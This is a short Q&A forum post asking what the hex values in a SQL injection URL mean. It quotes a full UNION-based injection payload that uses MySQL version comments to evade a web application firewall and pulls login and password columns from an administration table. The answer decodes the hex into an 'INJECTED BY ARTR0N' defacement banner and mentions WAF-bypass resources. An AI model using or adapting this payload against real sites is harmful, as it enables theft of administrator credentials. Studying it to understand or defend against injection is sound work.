# Hex in the SQL Injection query

Tags: sql-injection, mysql

1. What would these hashes be in the query?
2. How can I generate them?

> http://www.example.com?id=-29/*!50000UNION*/ /*!50000SELECT*/
>   1,2,0x3c68353e3c63656e7465723e494e4a45435445442042592041525452304e3c2f63656e7465723e3c2f68353e,4,5,0x494e4a45435445442042592041525452304e,7,8,9,10,11,12,13,14,15,16,17,18,/*!50000UNHEX(HEX(GROUP_CONCAT(login,0x3a,senha)))*/,0x494e4a45435445442042592041525452304e
>   FROM administracao

Comment: Gotta love casually posting a live SQLi bug for a government website.

Answer (score 1):

Regarding first question:

1. `0x494e4a45435445442042592041525452304e` translates to `"INJECTED BY ARTR0N"`
2. `0x3c68353e3c63656e7465723e494e4a45435445442042592041525452304e3c2f63656e7465723e3c2f68353e` translates to `<h5><center>INJECTED BY ARTR0N</center></h5>`

Regarding your second question, check [OWASP WAF Bypass](https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF) and search "String to Hex Converter", You will get what you asked for.